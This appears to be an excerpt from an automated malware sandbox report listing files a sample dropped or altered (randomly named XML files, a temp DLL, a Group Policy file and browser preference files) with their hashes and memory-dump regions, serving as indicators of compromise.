SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 d20cfa9b5738591152b5939d981f5910
SHA1 94ce3b7288cd55a5ca7b79321e76a0be79f70a6f
SHA256 cae47b558f1bd6234726f876c30beb36339354fcfa7638d3fb6f2ee27c6a335f
SHA512 308e353983553141e544eab3c6927a824ed989bfa9ed9b8457e4f6d32788e3d68679a23a4b79f36857815a6479c9d0fcc56ffc3cbfc4dde387c8047a52c077c4

C:\Program Files (x86)\prAQyJMeU\kFKuXmE.xml

MD5 2259c8d80073cf814d6a397256c9245d
SHA1 cb3bcb02e59593838507518036c3e20b05654bd4
SHA256 447b90ee6783a91711c1f436c02e2ae48464bf23980ba02a541b9ef628c811ff
SHA512 a827867bcb1b4ff52d8d43509e15138f9ee6039e88b1990e3f79afdc557df0c9954d89511773cff47f652a5c529892b8d879e05a5335b408d60405745f98616c

C:\Program Files (x86)\zNBDoCPwUgCU2\RTSVFYZ.xml

MD5 0ec1bacc81b9332b79b142898f4b6395
SHA1 c657a91663a9828fedcfaa0a4ee2445885cd2a06
SHA256 5816ce282e15defdc652b14a1733f9a9915a19cdadd49acb005a8d9db8ed3030
SHA512 541d0659392d08c5a37cf65ebd2e2a58ce11c75b25f8710944b97fd71b2675fc809874c7be07e70b5362f85b81cb8f67907d19d54078ffeb4bf6f0dfd7ed8b6b

C:\ProgramData\wpmocubwzvTKZWVB\dFstSeJ.xml

MD5 7ed0c5a33088e1632baa76d5afa40963
SHA1 8334299dc4500757d80bb77a184896be75cb9f9d
SHA256 3ea071e41ffeecdcdf423a0e7de56aff3f38b36ac118b614ff4528c29fdd5dbe
SHA512 b024509c5b7376b2ffcd01be93a78fce82ca67e858462c2f808c4ad3d89caa278422ff9d225fa2b65ef6b76312eeae7f2dfcc0a64fd7cadfb552b5fd24ef1f8d

C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\SFcnKKv.xml

MD5 921d9e40cb88d625c51ac4d738603501
SHA1 33739eee8c002512a94e9d313ece6bd46a077380
SHA256 358391c71b9f2fdeed5a4dfe0daabc05fc688375de2f6a98c83f39331b2992fa
SHA512 2fc6f1136f2d1433c9b1e0f54ca9d5cf1a30218f47fa2f5efc3260200902933ff65289e908b6f9c22e5b2bc8ab729d98ae626718045ed9c0dd376cd062d9909e

C:\Program Files (x86)\hkBthRLftwjEC\acvJZfh.xml

MD5 0ed21fc154bd19b4197ddea8c3f11185
SHA1 c240e0e7f4b2dae902b019efdfd8fbc46a312244
SHA256 cecd6da4ef8360f12ff324f7f1ca768257543bb4ac9069f224bedbd1e0ededb2
SHA512 0428218453fce8d0fe3b5bb678daabac8eeaff5fe69b8509b61cbd3575cc00a30321458da7d2312a68f94ad9f06e250be91d2cc7e43f6bc47d486d0dd0b38a03

C:\Windows\Temp\HKomOEKiubDeyUja\reURFsNl\ExiCsum.dll

MD5 216eb0d2159277ee754d47ff6f6ac846
SHA1 acd01636db032de730b96f3d97262989f530da36
SHA256 d488c456e9a11710894221582b8664e12fd716e621c12bc5247dba70459c7f95
SHA512 16d34eb7bb2c1a0ee2f949cd7615dc53e59b28b1380f4b0ebbc3a6ce31804a4defeb6c00715eac93d2b733411b15f1c970aa6777753ebe488f75840765ca551d

memory/4776-393-0x0000000003E70000-0x0000000003EF1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs.js

MD5 5e0b102438ed782fdef2b22f3cd84cb9
SHA1 98be3dd3d52b8668a8afbf6c9961dfeb2c099143
SHA256 a2857187603fca8f151a42fdbe0c3419ca329c2b0fc48c3789bfd6c669b312d3
SHA512 f5a0e06dfd4ec4fef31c558670552e9b7b4b1d1a62933e32422788dfea77c52926e9de6c54d3cb69eb7f988139f98d89671d477cca3a48ee25e0f37f29f6a539

memory/4776-403-0x00000000040D0000-0x00000000041B2000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c0d209ffc9bf7af36c5f5aa15254c388
SHA1 391c6383a13ac0bdc5ea694d010b93c5033250ea
SHA256 35a16777853adde71111202a915ffc5df6da141b84aa5bb0792e3e862e06e0f0
SHA512 1a414bae44df69d5f72a29c69c8f2ae9b7711408540ffce74177c209765d5261e36b89d604859a3f310fd463703d3da732888ac7681ae10746dcbc7f49340216

memory/4500-423-0x0000000003380000-0x0000000003968000-memory.dmp